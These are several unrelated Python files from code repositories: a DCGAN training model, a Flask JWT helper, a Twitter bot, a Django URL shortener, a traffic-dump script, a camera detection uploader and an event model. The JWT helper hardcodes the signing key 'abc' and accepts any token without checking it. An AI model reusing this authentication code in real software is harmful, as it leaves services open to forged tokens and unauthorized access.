self.sess.run(\n [self.Gs[0]],\n feed_dict=feed_dict\n )\n samples.append(cur_samples)\n samples = np.concatenate(samples, axis=0)\n assert samples.shape[0] == self.sample_size\n save_images(samples, [8, 8],\n self.sample_dir + '/train_%s.png' % idx)\n\n if time.time() - save_time > 3600:\n save_time = time.time()\n self.save(config.checkpoint_dir, counter)\n except tf.errors.OutOfRangeError:\n print(\"Done training; epoch limit reached.\")\n finally:\n coord.request_stop()\n\n coord.join(threads)\n # sess.close()\n\n def bn(self, tensor, name, batch_size=None):\n # the batch size argument is actually unused\n assert name.startswith('g_') or name.startswith('d_'), name\n if not hasattr(self, name):\n setattr(self, name, BatchNorm(batch_size, name=name))\n bn = getattr(self, name)\n return bn(tensor)\n\n def bn2(self, tensor, name):\n assert name.startswith('g_') or name.startswith('d_'), name\n if not hasattr(self, name):\n setattr(self, name, batch_norm_second_half(name=name))\n bn = getattr(self, name)\n return bn(tensor)\n\n def bn1(self, tensor, name):\n assert name.startswith('g_') or name.startswith('d_'), name\n if not hasattr(self, name):\n setattr(self, name, batch_norm_first_half(name=name))\n bn = getattr(self, name)\n return bn(tensor)\n\n def bnx(self, tensor, name):\n assert name.startswith('g_') or name.startswith('d_'), name\n if not hasattr(self, name):\n setattr(self, name, batch_norm_cross(name=name))\n bn = getattr(self, name)\n return bn(tensor)\n\n def vbn(self, tensor, name, half=None):\n if self.disable_vbn:\n class Dummy(object):\n def __init__(self, tensor, ignored, half):\n self.reference_output = tensor\n\n def __call__(self, x):\n return x\n\n VBN_cls = Dummy\n else:\n VBN_cls = VBN\n if not hasattr(self, name):\n vbn = VBN_cls(tensor, name, half=half)\n setattr(self, name, vbn)\n return vbn.reference_output\n vbn = getattr(self, name)\n return vbn(tensor)\n\n def vbnl(self, tensor, name, half=None):\n if self.disable_vbn:\n class Dummy(object):\n def 
__init__(self, tensor, ignored, half):\n self.reference_output = tensor\n\n def __call__(self, x):\n return x\n\n VBN_cls = Dummy\n else:\n VBN_cls = VBNL\n if not hasattr(self, name):\n vbn = VBN_cls(tensor, name, half=half)\n setattr(self, name, vbn)\n return vbn.reference_output\n vbn = getattr(self, name)\n return vbn(tensor)\n\n def vbnlp(self, tensor, name, half=None):\n if self.disable_vbn:\n class Dummy(object):\n def __init__(self, tensor, ignored, half):\n self.reference_output = tensor\n\n def __call__(self, x):\n return x\n\n VBN_cls = Dummy\n else:\n VBN_cls = VBNLP\n if not hasattr(self, name):\n vbn = VBN_cls(tensor, name, half=half)\n setattr(self, name, vbn)\n return vbn.reference_output\n vbn = getattr(self, name)\n return vbn(tensor)\n\n def vbn1(self, tensor, name):\n return self.vbn(tensor, name, half=1)\n\n def vbn2(self, tensor, name):\n return self.vbn(tensor, name, half=2)\n\n def save(self, checkpoint_dir, step):\n model_name = \"DCGAN.model\"\n model_dir = \"%s_%s\" % (self.dataset_name, self.batch_size)\n checkpoint_dir = os.path.join(checkpoint_dir, model_dir)\n\n if not os.path.exists(checkpoint_dir):\n os.makedirs(checkpoint_dir)\n\n self.saver.save(self.sess,\n os.path.join(checkpoint_dir, model_name),\n global_step=step)\n\n def load(self, checkpoint_dir):\n print(\" [*] Reading checkpoints...\")\n\n model_dir = \"%s_%s\" % (self.dataset_name, self.batch_size)\n checkpoint_dir = os.path.join(checkpoint_dir, model_dir)\n\n ckpt = tf.train.get_checkpoint_state(checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n ckpt_name = os.path.basename(ckpt.model_checkpoint_path)\n self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))\n return True\n else:\n print(\"Bad checkpoint: \", ckpt)\n return False\n\n\nclass BuildModel(object):\n \"\"\"\n A class that builds the generator forward prop when called.\n\n Parameters\n ----------\n dcgan: The DCGAN object to build within.\n func: The function to do it with.\n \"\"\"\n\n def __init__(self, dcgan):\n self.dcgan = dcgan\n self.func = build_model\n\n def __call__(self):\n return self.func(self.dcgan)\n\n\nclass GeneratorF(object):\n \"\"\"\n A class that builds the generator forward prop when called.\n\n Parameters\n ----------\n dcgan: The DCGAN object to build the generator within.\n func: The function to do it with.\n \"\"\"\n\n def __init__(self, dcgan, func):\n self.dcgan = dcgan\n self.func = func\n\n def __call__(self, z, y=None):\n return self.func(self.dcgan, z, y)\n\n\ndef get_vars(self):\n t_vars = tf.trainable_variables()\n self.d_vars = [var for var in t_vars if var.name.startswith('d_')]\n self.g_vars = [var for var in t_vars if var.name.startswith('g_')]\n for x in self.d_vars:\n assert x not in self.g_vars\n for x in self.g_vars:\n assert x not in self.d_vars\n for x in t_vars:\n assert x in self.g_vars or x in self.d_vars, x.name\n self.all_vars = t_vars\n\n\ndef read_and_decode(filename_queue):\n reader = tf.TFRecordReader()\n _, serialized_example = reader.read(filename_queue)\n features = tf.parse_single_example(\n serialized_example,\n features={\n 'image_raw': tf.FixedLenFeature([], tf.string),\n })\n\n image = tf.decode_raw(features['image_raw'], tf.uint8)\n image.set_shape(128 * 128 * 3)\n image = tf.reshape(image, [128, 128, 3])\n\n image = tf.cast(image, tf.float32) * (2. 
/ 255) - 1.\n\n return image\n\n\ndef read_and_decode_with_labels(filename_queue):\n reader = tf.TFRecordReader()\n _, serialized_example = reader.read(filename_queue)\n features = tf.parse_single_example(\n serialized_example,\n features={\n 'image_raw': tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.int64)\n })\n\n image = tf.decode_raw(features['image_raw'], tf.uint8)\n image.set_shape(128 * 128 * 3)\n image = tf.reshape(image, [128, 128, 3])\n\n image = tf.cast(image, tf.float32) * (2. / 255) - 1.\n\n label = tf.cast(features['label'], tf.int32)\n\n return image, label\n\n\ndef sigmoid_kl_with_logits(logits, targets):\n # broadcasts the same target value across the whole batch\n # this is implemented so awkwardly because tensorflow lacks an x log x op\n assert isinstance(targets, float)\n if targets in [0., 1.]:\n entropy = 0.\n else:\n entropy = - targets * np.log(targets) - (1. - targets) * np.log(1. - targets)\n return tf.nn.sigmoid_cross_entropy_with_logits(logits, tf.ones_like(logits) * targets) - entropy\n\n\nclass VBNL(object):\n \"\"\"\n Virtual Batch Normalization, Log scale for the scale parameter\n \"\"\"\n\n def __init__(self, x, name, epsilon=1e-5, half=None):\n \"\"\"\n x is the reference batch\n \"\"\"\n assert isinstance(epsilon, float)\n\n self.half = half\n shape = x.get_shape().as_list()\n needs_reshape = len(shape) != 4\n if needs_reshape:\n orig_shape = shape\n if len(shape) == 2:\n x = tf.reshape(x, [shape[0], 1, 1, shape[1]])\n elif len(shape) == 1:\n x = tf.reshape(x, [shape[0], 1, 1, 1])\n else:\n assert False, shape\n shape = x.get_shape().as_list()\n with tf.variable_scope(name) as scope:\n assert name.startswith(\"d_\") or name.startswith(\"g_\")\n self.epsilon = epsilon\n self.name = name\n if self.half is None:\n half = x\n elif self.half == 1:\n half = tf.slice(x, [0, 0, 0, 0],\n [shape[0] // 2, shape[1], shape[2], shape[3]])\n elif self.half == 2:\n half = tf.slice(x, [shape[0] // 2, 0, 0, 0],\n [shape[0] // 2, shape[1], shape[2], shape[3]])\n else:\n assert False\n self.mean = tf.reduce_mean(half, [0, 1, 2], keep_dims=True)\n self.mean_sq = tf.reduce_mean(tf.square(half), [0, 1, 2], keep_dims=True)\n self.batch_size = int(half.get_shape()[0])\n assert x is not None\n assert self.mean is not None\n assert self.mean_sq is not None\n out = self._normalize(x, self.mean, self.mean_sq, \"reference\")\n if needs_reshape:\n out = tf.reshape(out, orig_shape)\n self.reference_output = out\n\n def __call__(self, x):\n\n shape = x.get_shape().as_list()\n needs_reshape = len(shape) != 4\n if needs_reshape:\n orig_shape = shape\n if len(shape) == 2:\n x = tf.reshape(x, [shape[0], 1, 1, shape[1]])\n elif len(shape) == 1:\n x = tf.reshape(x, [shape[0], 1, 1, 1])\n else:\n assert False, shape\n shape = x.get_shape().as_list()\n with tf.variable_scope(self.name) as scope:\n new_coeff = 1. / (self.batch_size + 1.)\n old_coeff = 1. 
- new_coeff\n new_mean = tf.reduce_mean(x, [1, 2], keep_dims=True)\n new_mean_sq = tf.reduce_mean(tf.square(x), [1, 2], keep_dims=True)\n mean = new_coeff * new_mean + old_coeff * self.mean\n mean_sq = new_coeff * new_mean_sq + old_coeff * self.mean_sq\n out = self._normalize(x, mean, mean_sq, \"live\")\n if needs_reshape:\n out = tf.reshape(out, orig_shape)\n return out\n\n def _normalize(self, x, mean, mean_sq, message):\n # make sure this is called with a variable scope\n shape = x.get_shape().as_list()\n assert len(shape) == 4\n self.gamma_driver = tf.get_variable(\"gamma_driver\", [shape[-1]],\n initializer=tf.random_normal_initializer(0., 0.02))\n gamma = tf.exp(self.gamma_driver)\n gamma = tf.reshape(gamma, [1, 1, 1, -1])\n self.beta = tf.get_variable(\"beta\", [shape[-1]],\n initializer=tf.constant_initializer(0.))\n beta = tf.reshape(self.beta, [1, 1, 1, -1])\n assert self.epsilon is not None\n assert mean_sq is not None\n assert mean is not None\n std = tf.sqrt(self.epsilon + mean_sq - tf.square(mean))\n out = x - mean\n out = out / std\n # out = tf.Print(out, [tf.reduce_mean(out, [0, 1, 2]),\n # tf.reduce_mean(tf.square(out - tf.reduce_mean(out, [0, 1, 2], keep_dims=True)), [0, 1, 2])],\n # message, first_n=-1)\n out = out * gamma\n out = out + beta\n return out\n\n\nclass VBNLP(object):\n \"\"\"\n Virtual Batch Normalization, Log scale for the scale parameter, per-Pixel normalization\n \"\"\"\n\n def __init__(self, x, name, epsilon=1e-5, half=None):\n \"\"\"\n x is the reference batch\n \"\"\"\n assert isinstance(epsilon, float)\n\n self.half = half\n shape = x.get_shape().as_list()\n needs_reshape = len(shape) != 4\n if needs_reshape:\n orig_shape = shape\n if len(shape) == 2:\n x = tf.reshape(x, [shape[0], 1, 1, shape[1]])\n elif len(shape) == 1:\n x = tf.reshape(x, [shape[0], 1, 1, 1])\n else:\n assert False, shape\n shape = x.get_shape().as_list()\n with tf.variable_scope(name) as scope:\n assert name.startswith(\"d_\") or name.startswith(\"g_\")\n self.epsilon = epsilon\n self.name = name\n if self.half is None:\n half = x\n elif self.half == 1:\n half = tf.slice(x, [0, 0, 0, 0],\n [shape[0] // 2, shape[1], shape[2], shape[3]])\n elif self.half == 2:\n half = tf.slice(x, [shape[0] // 2, 0, 0, 0],\n [shape[0] // 2, shape[1], shape[2], shape[3]])\n else:\n assert False\n self.mean = tf.reduce_mean(half, [0], keep_dims=True)\n self.mean_sq = tf.reduce_mean(tf.square(half), [0], keep_dims=True)\n self.batch_size = int(half.get_shape()[0])\n assert x is not None\n assert self.mean is not None\n assert self.mean_sq is not None\n out = self._normalize(x, self.mean, self.mean_sq, \"reference\")\n if needs_reshape:\n out = tf.reshape(out, orig_shape)\n self.reference_output = out\n\n def __call__(self, x):\n\n shape = x.get_shape().as_list()\n needs_reshape = len(shape) != 4\n if needs_reshape:\n orig_shape = shape\n if len(shape) == 2:\n x = tf.reshape(x, [shape[0], 1, 1, shape[1]])\n elif len(shape) == 1:\n x = tf.reshape(x, [shape[0], 1, 1, 1])\n else:\n assert False, shape\n shape = x.get_shape().as_list()\n with tf.variable_scope(self.name) as scope:\n new_coeff = 1. / (self.batch_size + 1.)\n old_coeff = 1. 
- new_coeff\n new_mean = x\n new_mean_sq = tf.square(x)\n mean = new_coeff * new_mean + old_coeff * self.mean\n mean_sq = new_coeff * new_mean_sq + old_coeff * self.mean_sq\n out = self._normalize(x, mean, mean_sq, \"live\")\n if needs_reshape:\n out = tf.reshape(out, orig_shape)\n return out\n\n def _normalize(self, x, mean, mean_sq, message):\n # make sure this is called with a variable scope\n shape = x.get_shape().as_list()\n assert len(shape) == 4\n self.gamma_driver = tf.get_variable(\"gamma_driver\", shape[1:],\n initializer=tf.random_normal_initializer(0., 0.02))\n gamma = tf.exp(self.gamma_driver)\n gamma = tf.expand_dims(gamma, 0)\n self.beta = tf.get_variable(\"beta\", shape[1:],\n initializer=tf.constant_initializer(0.))\n beta = tf.expand_dims(self.beta, 0)\n assert self.epsilon is not None\n assert mean_sq is not None\n assert mean is not None\n std = tf.sqrt(self.epsilon + mean_sq - tf.square(mean))\n out = x - mean\n out = out / std\n # out = tf.Print(out, [tf.reduce_mean(out, [0, 1, 2]),\n # tf.reduce_mean(tf.square(out - tf.reduce_mean(out, [0, 1, 2], keep_dims=True)), [0, 1, 2])],\n # message, first_n=-1)\n out = out * gamma\n out = out + beta\n return out\n\n\nclass VBN(object):\n \"\"\"\n Virtual Batch Normalization\n \"\"\"\n\n def __init__(self, x, name, epsilon=1e-5, half=None):\n \"\"\"\n x is the reference batch\n \"\"\"\n assert isinstance(epsilon, float)\n\n self.half = half\n shape = x.get_shape().as_list()\n needs_reshape = len(shape) != 4\n if needs_reshape:\n orig_shape = shape\n if len(shape) == 2:\n x = tf.reshape(x, [shape[0], 1, 1, shape[1]])\n elif len(shape) == 1:\n x = tf.reshape(x, [shape[0], 1, 1, 1])\n else:\n assert False, shape\n shape = x.get_shape().as_list()\n with tf.variable_scope(name) as scope:\n assert name.startswith(\"d_\") or name.startswith(\"g_\")\n self.epsilon = epsilon\n self.name = name\n if self.half is None:\n half = x\n elif self.half == 1:\n half = tf.slice(x, [0, 0, 0, 0],\n [shape[0] // 2, shape[1], shape[2], shape[3]])\n elif self.half == 2:\n half = tf.slice(x, [shape[0] // 2, 0, 0, 0],\n [shape[0] // 2, shape[1], shape[2], shape[3]])\n else:\n assert False\n self.mean = tf.reduce_mean(half, [0, 1, 2], keep_dims=True)\n self.mean_sq = tf.reduce_mean(tf.square(half), [0, 1, 2], keep_dims=True)\n self.batch_size = int(half.get_shape()[0])\n assert x is not None\n assert self.mean is not None\n assert self.mean_sq is not None\n out = self._normalize(x, self.mean, self.mean_sq, \"reference\")\n if needs_reshape:\n out = tf.reshape(out, orig_shape)\n self.reference_output = out\n\n def __call__(self, x):\n\n shape = x.get_shape().as_list()\n needs_reshape = len(shape) != 4\n if needs_reshape:\n orig_shape = shape\n if len(shape) == 2:\n x = tf.reshape(x, [shape[0], 1, 1, shape[1]])\n elif len(shape) == 1:\n x = tf.reshape(x, [shape[0], 1, 1, 1])\n else:\n assert False, shape\n shape = x.get_shape().as_list()\n with tf.variable_scope(self.name) as scope:\n new_coeff = 1. / (self.batch_size + 1.)\n old_coeff = 1. 
- new_coeff\n new_mean = tf.reduce_mean(x, [1, 2], keep_dims=True)\n new_mean_sq = tf.reduce_mean(tf.square(x), [1, 2], keep_dims=True)\n mean = new_coeff * new_mean + old_coeff * self.mean\n mean_sq = new_coeff * new_mean_sq + old_coeff * self.mean_sq\n out = self._normalize(x, mean, mean_sq, \"live\")\n if needs_reshape:\n out = tf.reshape(out, orig_shape)\n return out\n\n def _normalize(self, x, mean, mean_sq, message):\n # make sure this is called with a variable scope\n shape = x.get_shape().as_list()\n assert len(shape) == 4\n self.gamma = tf.get_variable(\"gamma\", [shape[-1]],\n initializer=tf.random_normal_initializer(1., 0.02))\n gamma = tf.reshape(self.gamma, [1, 1, 1, -1])\n self.beta = tf.get_variable(\"beta\", [shape[-1]],\n initializer=tf.constant_initializer(0.))\n beta = tf.reshape(self.beta, [1, 1, 1, -1])\n assert self.epsilon is not None\n assert mean_sq is not None\n assert mean is not None\n std = tf.sqrt(self.epsilon + mean_sq - tf.square(mean))\n out = x - mean\n out = out / std\n # out = tf.Print(out, [tf.reduce_mean(out, [0, 1, 2]),\n # tf.reduce_mean(tf.square(out - tf.reduce_mean(out, [0, 1, 2], keep_dims=True)), [0, 1, 2])],\n # message, first_n=-1)\n out = out * gamma\n out = out + beta\n return out\n","sub_path":"imagenet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":41045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"401278083","text":"from functools import wraps\nfrom flask import request, Response\nimport json\nfrom jwt import (\n JWT,\n jwk_from_dict,\n jwk_from_pem,\n)\n\ninstance = JWT()\nsigning_key = jwk_from_dict({\n 'k':'abc',\n 'kty': 'oct'\n })\n\ndef encode_auth_token(utenteloggato):\n try:\n if utenteloggato.ruolo == 'abcde':\n payload = {\n 'username': utenteloggato.username,\n 'ruolo': 'abcde'\n }\n elif utenteloggato.ruolo == 'root':\n payload = {\n 'username': utenteloggato.username,\n 'ruolo': 'root'\n }\n else:\n payload = {\n 'username': utenteloggato.username\n }\n return instance.encode(\n payload,\n signing_key,\n alg='HS256'\n )\n except Exception as e:\n return e\n\ndef requires_auth(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n auth_token = False\n if not auth_token:\n auth_token = request.headers.get('capstoneAuth')\n if not auth_token:\n auth_token = request.headers.get('Authorization')\n if not auth_token:\n auth_token = request.cookies.get('capstoneAuth')\n if not auth_token: # Authtoken no present so send 401\n return Response('Token mancante!\\n' 'Mancano le autorizzazioni per effettuare la chiamata', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})\n else:\n return f(*args, **kwargs)\n return decorated\n\ndef decode_auth_token(token):\n try:\n token = token.replace(\"Bearer \",'')\n message_received = instance.decode(token, signing_key)\n return(message_received)\n except Exception as e:\n return e","sub_path":"jwtlib.py","file_name":"jwtlib.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"395144121","text":"#!/usr/local/bin/python2\n# -*- coding: utf-8 -*-\n\nimport tweepy\nimport myLogging\nfrom myTweetProcessings import getImages, getText\nfrom myImgProcessing import genFromText, writeOnImg, addLogo\nfrom myProjectsProcessing import answerWithInfo\nimport myGlobals\nimport os\nimport urllib\n\nself = \"hdm_bot\" # the bot's name on Twitter without the \"@\"\n\nclass MyStreamListener(tweepy.StreamListener):\n\n def 
on_status(self, tweet):\n        if not tweet.retweeted and tweet.user.screen_name != 'hdm_bot': # ignore retweets and own posts\n            # process tweet\n            myLogging.writeTweet(tweet)\n            tweet_text = unicode(getText(tweet))\n            tweet_images = getImages(tweet)\n\n            # react to specific hashtags - functionality can be added here easily\n            if \"#followme\" in tweet_text.lower():\n                myGlobals.api.create_friendship(tweet.user.screen_name)\n            if \"ich liebe dich\" in tweet_text.lower():\n                myGlobals.api.update_status(\"Oh @\" + tweet.user.screen_name + \"! Auch ich sehne mich nach dir!\")\n                myLogging.write(\"(\" + str(tweet.id) + \") @\" + tweet.user.screen_name + \" + @hdm_bot = <3\")\n            if \"#projektinfo\" in tweet_text.lower():\n                answerWithInfo(tweet_text, tweet.id, tweet.user.screen_name)\n\n            # processing images\n            if len(tweet_images) > 0:\n                myLogging.write(\"(\" + str(tweet.id) + \") processing \" + str(len(tweet_images)) + \" image(s)...\")\n                if tweet_text[:9] == \"@hdm_bot \":\n                    if len(tweet_text[9:].strip(' ')) == 0: # \"@hdm_bot\" at the beginning is the only text (slice off the prefix; str.strip would remove characters, not a prefix)\n                        tweet_text = \"Whooop Whooop! Happy Medianight!\" # write some default stuff on picture\n                    elif len(tweet_text[9:].strip(\" \")) > 0: # \"@hdm_bot\" is not the only text\n                        tweet_text = tweet_text[9:].strip(\" \") # delete @hdm_bot on beginning, keep text\n                for i in range(len(tweet_images)):\n                    picname = \"%s_%i\" % (str(tweet.id), i+1)\n                    filename = os.path.join(\"./images/\", picname + '.jpg')\n                    urllib.urlretrieve(tweet_images[i], filename)\n                    outputFile = writeOnImg(filename, tweet_text)\n                    outputFile = addLogo(outputFile)\n                    myLogging.write(\"(\" + str(tweet.id) + \") posting processed image ( \" + outputFile[9:] + \" )\")\n                    myGlobals.api.update_with_media('%s' % outputFile, '@' + tweet.user.screen_name + ' #medianight #socialbots')\t# post image @user\n\n    def on_error(self, status_code):\n        if status_code == 420:\t# rate limited\n            myLogging.writeSys('ERROR 420: rate limited')\n        else:\n            myLogging.writeSys('ERROR' + str(status_code))\n        return False\n","sub_path":"myStreamListener.py","file_name":"myStreamListener.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"189737372","text":"import hashlib\nimport base64\n\nfrom django.db import models\n\n\nclass TimeStampedModel(models.Model):\n    \"\"\"\n    Abstract base class that provides self-updating 'created' and 'modified'\n    fields.\n    \"\"\"\n    created = models.DateTimeField(auto_now_add=True)\n    modified = models.DateTimeField(auto_now=True)\n\n    class Meta:\n        abstract = True\n\n\nclass ShortenedUrlManager(models.Manager):\n\n    def original_exists(self, url):\n        exists = False\n        if self.filter(original=url):\n            exists = True\n\n        return exists\n\n    def already_shortened(self, url):\n        is_shortened = False\n        if self.filter(shortened=url):\n            is_shortened = True\n\n        return is_shortened\n\n    def shorten(self, original_url):\n        \"\"\"\n        Generates a value to use for the shortened URL that is URL-safe.\n\n        Steps:\n        1. Generate an MD5 checksum of the given URL to produce a\n           random/unique string/digest.\n        2. Base64-encode the MD5 checksum to create a URL-safe value.\n        3. Strip the '=' sign as it will get in the way of capturing URL\n           parameters.\n        4. Take the first 5 characters from the encoded value.\n\n        Caveats:\n        1. 
Collision is possible since we're only taking the first 5\n characters, but it would still take a very large number of records\n before this becomes an issue.\n \"\"\"\n checksum = hashlib.md5(original_url).digest()\n value = base64.urlsafe_b64encode(checksum).strip('=')\n\n return value[:5]\n\n\nclass ShortenedUrl(TimeStampedModel):\n \"\"\"\n Store the original URL provided by the user and the shortened version\n generated by the system.\n \"\"\"\n objects = ShortenedUrlManager()\n\n original = models.URLField(\n unique=True, null=False, blank=False, max_length=5000)\n shortened = models.CharField(\n unique=True, null=False, blank=False, max_length=5000)\n","sub_path":"web/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"248893350","text":"from time import sleep,time\nimport cv2\nimport numpy as np\nimport os\nimport pathlib\nimport picamera\nimport requests\nimport tensorflow as tf\nfrom io import BytesIO\nfrom picamera.array import PiRGBArray\n\n# uploadUrl = \"http://192.168.1.49:3000/api/upload-live\"\nuploadUrl = \"https://manu-cam.vercel.app/api/upload-live\"\n\n# Load the TFLite model and allocate tensors\nmodelPath = str(pathlib.Path(__file__).parent / 'tflite-manu_images_v1' / 'model.tflite')\ninterpreter = tf.lite.Interpreter(model_path=modelPath)\ninterpreter.allocate_tensors()\n\ncamera = picamera.PiCamera()\n\n# camera.rotation = 0\ncamera.resolution = (1024,768)\n\ndef setInputImage(image):\n interpreter.set_tensor(interpreter.get_input_details()[0]['index'], [image])\n\ndef getOutputRects():\n return interpreter.get_tensor(interpreter.get_output_details()[0]['index'])[0]\n\ndef getOutputScores():\n return interpreter.get_tensor(interpreter.get_output_details()[2]['index'])[0]\n\ndef detectManu():\n image = PiRGBArray(camera)\n camera.capture(image, 'bgr')\n image = image.array\n # image = cv2.imread('./test.jpg', cv2.IMREAD_COLOR)\n\n # Resize to tensorflow expected size\n image = cv2.resize(image, (512, 512))\n\n setInputImage(image)\n\n interpreter.invoke()\n\n bestScore = getOutputScores()[0]\n \n bestRect = getOutputRects()[0]\n\n box = {\n 'score': float(bestScore),\n 'x1': float(bestRect[1]),\n 'y1': float(bestRect[0]),\n 'x2': float(bestRect[3]),\n 'y2': float(bestRect[2]),\n }\n\n (_, imageStream) = cv2.imencode('.jpg', image)\n\n return (imageStream, box)\n\nwhile True:\n startTime = time() \n\n # Detect manu\n (imageStream, box) = detectManu()\n \n try:\n res = requests.post(uploadUrl,\n headers={'Authorization': 'Bearer ' + os.environ['MANUCAM_AUTH']},\n files={'image': imageStream},\n data=box)\n try:\n endTime = time()\n print(res.json(), ' [', round(endTime - startTime, 2), 's ]')\n except:\n print(\"Invalid response\")\n print(res.text)\n except Exception as err:\n print(\"Failed to upload image\")\n print(err) \n \n # sleep(2)","sub_path":"manu-ai/live-detect-test.py","file_name":"live-detect-test.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"314117340","text":"#!/usr/bin/python3\nimport pickle\nimport getopt\nimport sys\n\n#serialize\ndef serialize(arrlist, filename):\n f = open (filename, \"wb\")\n pickle.dump(arrlist, f)\n f.close()\n\n#deserialize\ndef deserialize(filename):\n f = open(filename, \"rb\")\n arrlist = pickle.load(f)\n return arrlist\n\n#Response object\nclass Response:\n def __init__(self, http_content_type, 
http_content_length, tcp_segment_count, file_data, tcp_data_length, tcp_data, frame_no):\n self.http_content_type = http_content_type\n self.http_content_length = http_content_length\n self.tcp_segment_count = tcp_segment_count\n self.file_data = file_data\n self.tcp_data_length = tcp_data_length\n self.tcp_data = tcp_data\n self.frame_no = frame_no\n\n#Request object\nclass Request:\n def __init__(self, host, method, url, accept_encoding, key, value, time, frame_no):\n self.http_method = method\n self.http_uri = url\n self.http_accept_encoding = accept_encoding\n self.http_urlencoded_key = key\n self.http_urlencoded_value = value\n self.frame_time = time\n self.http_host = host\n self.frame_no = frame_no\n\ndef regexURLRefinement(s):\n s = s.replace(\"http://\", \"\")\n s = s.replace(\"https://\", \"\")\n s = s.replace(\"?\", \"\\\\?\")\n s = s.replace(\"$\", \"\\\\$\")\n s = s.replace(\".*\", \"####\")\n s = s.replace(\".\", \"\\\\.\")\n s = s.replace(\"####\", \".*\")\n s = s.replace(\"://\", \"####\")\n s = s.replace(\"//\", \"/\")\n s = s.replace(\"####\", \"://\")\n s = s.replace(\"/\", \"\\\\/\")\n s = s.replace(\"{\", \"\\\\{\")\n s = s.replace(\"}\", \"\\\\}\")\n s = s.replace(\"[\", \"\\\\[\")\n s = s.replace(\"]\", \"\\\\]\")\n\n s = \"^\" + s + \"$\"\n\n return s\n\ndef isValidRegex(r):\n return r != \".*\" and r != \".*.*\" and r != \".*/\"\n\ndef loadsigs(sigfile):\n global sig_list\n global reqIDList\n sig_list = []\n\n f = open(sigfile, 'r')\n while True:\n line = f.readline()\n\n if not line:\n break\n\n originsig = line.split(' ')[1].strip()\n\n if (isValidRegex(originsig)):\n originsig = regexURLRefinement(originsig)\n sig_list.append(originsig.strip())\n\n f.close()\n\n filename = \"./classify/\" + APPID + \"_regex.sigs\"\n f = open(filename, \"w\")\n for i in range(len(sig_list)):\n sig = sig_list[i] + \"\\n\"\n f.write(sig)\n f.close()\n\ndef getReqDumpPath(appName):\n return \"./Dump/\" + appName + \".reqDump\"\n\ndef getRespDumpPath(appName):\n return \"./Dump/\" + appName + \".respDump\"\n\ndef loadDump(appName):\n global request_list\n global response_list\n\n request_list = deserialize(getReqDumpPath(appName))\n response_list = deserialize(getRespDumpPath(appName))\n\nif __name__ == '__main__':\n tid = 0\n matchedcount = 0\n sentcount = 0\n request_list = []\n response_list = []\n DUMP_FILE = None\n APPID = None\n appname = ['flipagram', 'doordash', 'wish', 'accuweather', 'zodiac', 'geek', 'postmates', 'mcdo', 'purple', 'starz']\n\n\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"i:\")\n except getopt.GetoptError:\n print(\"python -i \")\n sys.exit(2)\n \n for opt, arg in opts:\n if opt == \"-i\":\n APPID = arg\n else:\n print(\"python -i -a \")\n sys.exit(2)\n\n print(\"Load signatures ...\")\n loadsigs(\"./classify/\" + APPID + \".sigs\")\n\n print(\"Loading req/resp dumps ...\")\n APP_NAME = appname[int(APPID)-1]\n loadDump(APP_NAME)\n\n print(\"Writing req files ...\")\n for i in range(len(request_list)):\n req = request_list[i]\n req_f = \"./Dump/\" + APP_NAME + \"/req/\"\n filename1 = req_f + \"uri_\" + str(i)\n filename2 = req_f + \"key_\" + str(i)\n filename3 = req_f + \"val_\" + str(i)\n f1 = open(filename1, \"w\")\n f2 = open(filename2, \"w\")\n f3 = open(filename3, \"w\")\n f1.write(req.http_uri)\n f2.write(req.http_urlencoded_key)\n f3.write(req.http_urlencoded_value)\n f1.close()\n f2.close()\n f3.close()\n print(\"Writing resp files ...\")\n for j in range(len(response_list)):\n resp = response_list[j]\n resp_f = \"./Dump/\" + APP_NAME + 
\"/resp/\"\n        filename1 = resp_f + \"http_content_type_\" + str(j)\n        filename2 = resp_f + \"file_data_\" + str(j)\n        f1 = open(filename1, \"w\")\n        f2 = open(filename2, \"w\")\n        f1.write(resp.http_content_type)\n        f2.write(resp.file_data)\n        f1.close()\n        f2.close()\n","sub_path":"dump.py","file_name":"dump.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"47512994","text":"from models.base_model import BaseModel\nfrom models.user import User\nfrom flask import flash\nimport peewee as pw\nfrom playhouse.hybrid import hybrid_property\nfrom config import S3_LOCATION, DEFAULT_EVENT_IMAGE\nfrom datetime import datetime, timedelta\n\nclass Event(BaseModel):\n    name = pw.CharField(null=False)\n    description = pw.CharField(null=True)\n    location = pw.CharField(default=\"TBC\")\n    host = pw.ForeignKeyField(User, backref='events_hosting')\n    time = pw.DateTimeField(null=True)\n    event_image = pw.CharField(default=DEFAULT_EVENT_IMAGE)\n    # guest = pw.ForeignKeyField(User, backref='events_attending', null=True)\n    max_number=pw.IntegerField(default=0)\n    private = pw.BooleanField(default = True)\n\n    @hybrid_property\n    def event_image_url(self):\n        return S3_LOCATION + self.event_image\n    \n    def validate(self):\n        #check that event has at least a name\n        if self.name=='':\n            self.errors.append('Event name cannot be empty')\n        \n        #check that the event time is at least 1 hour ahead of the current time. Might be an issue due to server lag / timeout.\n        current_time=datetime.now()\n        if self.time!='':\n            self.time =datetime.strptime(self.time, \"%Y-%m-%dT%H:%M\") #convert string to datetime object\n            # self.time =datetime.strptime(self.time) #convert string to datetime object\n            if (self.time - current_time) < timedelta(hours=1):\n                self.errors.append('Event has to be in the future')\n        else:\n            self.time = datetime.now() + timedelta(hours=1)\n    